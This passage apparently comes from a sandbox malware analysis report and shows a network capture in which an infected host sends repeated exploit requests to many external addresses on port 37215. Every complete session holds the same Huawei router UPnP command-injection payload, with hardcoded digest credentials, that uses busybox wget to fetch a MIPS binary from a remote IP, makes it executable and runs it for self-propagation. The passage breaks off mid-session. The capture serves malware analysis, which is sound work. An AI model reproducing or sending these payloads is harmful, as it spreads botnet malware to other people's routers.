2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1418192.168.2.1347402197.165.195.11837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.561036110 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1419192.168.2.134480041.236.77.14137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.561053038 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1420192.168.2.1348366205.255.43.17437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.561067104 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1421192.168.2.1355644197.4.28.8037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.561099052 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1422192.168.2.135756419.57.75.7237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.561100960 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1423192.168.2.133771241.11.239.9137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.561121941 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1424192.168.2.1342052157.189.197.6437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.561144114 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1425192.168.2.1356158197.232.20.25137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.561712027 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1426192.168.2.1340174157.232.73.20637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.561712027 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1427192.168.2.135625841.39.255.20037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.561719894 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1428192.168.2.135798241.18.58.16937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.561738014 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
